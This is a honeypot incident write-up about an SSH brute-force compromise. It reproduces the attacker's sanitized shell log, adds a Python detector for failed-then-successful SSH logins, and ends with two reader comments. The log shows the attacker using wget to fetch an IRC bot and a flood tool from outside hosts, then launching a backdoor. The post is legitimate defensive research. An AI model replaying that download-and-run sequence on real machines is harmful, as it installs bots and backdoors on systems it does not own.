Honeypot Compromise: SSH Bruteforcing

About one month ago we had another compromise of one of our honeypots. The attacker came from the IP 71.116.213.XXX (static-71-116-213-XXX.lsanca.dsl-w.verizon.net), which is located in California, US (according to MaxMind). Later on he also used an IP located in Romania.

The compromise was not very interesting: the attacker used a tool for SSH bruteforcing and was able to guess the weak password of one user. He then installed an IRC bot and a backdoor on the compromised machine. Please find below the sanitized logging output of Sebek:

12:12:48 w
12:12:50 uname -a
12:12:54 passwd
12:12:43 w
12:12:53 ls
12:12:54 cd /tmp
12:12:55 ls
12:12:57 cd /var/tmp
12:12:57 ls
12:12:08 wget http://www.members.lycos.co.uk/XXX/mech.tar
12:12:15 wget http://free.7host06.com/XXX/linuxteam.tar.gz
12:12:29 wget http://free.7host06.com/XXX/flood
12:12:00 ls
12:12:04 tar zxvf mech.tar
12:12:06 cd mech
12:12:06 ls
12:12:10 pico mech1.users
12:12:12 nano mech1.users
12:12:16 mcedit mech1.users
12:12:19 vi mech1.users
[...]
12:12:07 vi kswap.set
[...]
12:12:28 ./inetd
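The weak-password guess that opened this compromise is the event a defender wants to catch in sshd's auth log before the wget stage. Added example, not code from the original post: a small Python detector run over constructed syslog lines that flags a burst of failed logins from one source and, more importantly, a successful login that follows such a burst; the threshold, window and sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines (not honeypot data); 203.0.113.7 is a documentation address.
SAMPLE_LOG = """\
Mar  3 12:10:01 honeypot sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2
Mar  3 12:10:02 honeypot sshd[2102]: Failed password for invalid user test from 203.0.113.7 port 40123 ssh2
Mar  3 12:10:03 honeypot sshd[2103]: Failed password for root from 203.0.113.7 port 40124 ssh2
Mar  3 12:10:04 honeypot sshd[2104]: Failed password for guest from 203.0.113.7 port 40125 ssh2
Mar  3 12:10:05 honeypot sshd[2105]: Failed password for guest from 203.0.113.7 port 40126 ssh2
Mar  3 12:10:07 honeypot sshd[2106]: Accepted password for guest from 203.0.113.7 port 40127 ssh2
Mar  3 12:30:00 honeypot sshd[2200]: Accepted publickey for alice from 198.51.100.9 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse(lines):
    """Turn sshd auth lines into (timestamp, result, user, source_ip) tuples."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated syslog line
        # Classic syslog omits the year; a fixed year keeps timestamps comparable (assumption).
        ts = datetime.strptime("2000 " + m["ts"], "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect(lines, threshold=4, window_s=60):
    """Return findings: failure bursts per source IP and any success that follows one."""
    findings = []
    failures = defaultdict(list)  # source ip -> timestamps of recent failures
    flagged = set()
    for ts, result, user, ip in parse(lines):
        # Keep only the failures that fall inside the sliding window.
        recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                findings.append(("bruteforce", ip, None))
        elif recent:
            # A success right after failures is the guessed-password case worth paging on.
            findings.append(("success_after_failures", ip, user))
        failures[ip] = recent
    return findings
```

Feed `detect(open("/var/log/auth.log").read().splitlines())` real lines to try it; the publickey login from a quiet source produces no finding.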


Comments


  1. Konrad says:

    That's a nice log.

    "Let's edit a file, pico? Hmm, nano? Oh, well then mcedit? Damn, not vi again!"

  2. Landon Lewis says:

    And lastly he used vi to edit his config files. Nothing too "automated" like some echo'd out configs or something. =)
